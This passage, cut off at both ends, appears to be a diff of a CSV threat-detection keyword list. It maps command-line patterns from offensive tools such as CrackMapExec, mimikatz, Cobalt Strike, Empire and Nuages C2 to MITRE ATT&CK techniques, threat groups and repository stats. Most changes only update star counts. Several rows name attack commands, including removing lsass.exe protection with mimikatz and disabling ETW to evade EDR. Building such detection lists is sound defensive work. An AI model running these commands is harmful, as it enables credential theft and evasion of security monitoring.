tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"* -X '$PSVersionTable' *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -X '[System.Environment]::Is64BitProcess'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -X FUZZ http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* x11-access.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmlrpc-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmpp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmpp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xpipe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" -"* Your payload has been delivered*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -z burplog*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -z file*wordlist/*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -z list*nonvalid-httpwatch --basic*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -z range --zD 0-1 -u http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -z range*0-10 --hl 97 http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* Your payload has been delivered*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -z burplog*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z file*wordlist/*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z list*nonvalid-httpwatch --basic*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z range --zD 0-1 -u http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z range*0-10 --hl 97 http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*!autoruns *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!files upload *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!handlers load *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!implants *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!interactive *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!modules load *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*!processprotect *lsass.exe*","offensive_tool_keyword","mimikatz","removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. command: !processprotect /process:lsass.exe /remove","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*!processprotect *lsass.exe*","offensive_tool_keyword","mimikatz","removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. command: !processprotect /process:lsass.exe /remove","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*!put */tmp*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!shell *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!tunnels --tcp*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!use *aes256_py*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!use *reflected_assembly*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*!wPkgPath!*!ak!*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*$attacker_IPlist*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*!wPkgPath!*!ak!*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*$attacker_IPlist*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*$C2_SERVER*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" -"*$DummyServiceName*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*$DummyServiceName*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*$env:COMPlus_ETWEnabled=0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*$FilterArgs = @{ name='Notion'*EventNameSpace='root\\CimV2'*QueryLanguage=*WQL* Query=*SELECT * FROM __InstanceModificationE*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" -"*$KeePassBinaryPath*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*$KeePassUser*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*%APPDATA%/Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*$KeePassBinaryPath*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*$KeePassUser*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*%APPDATA%/Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*%comspec% /k *.bat*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 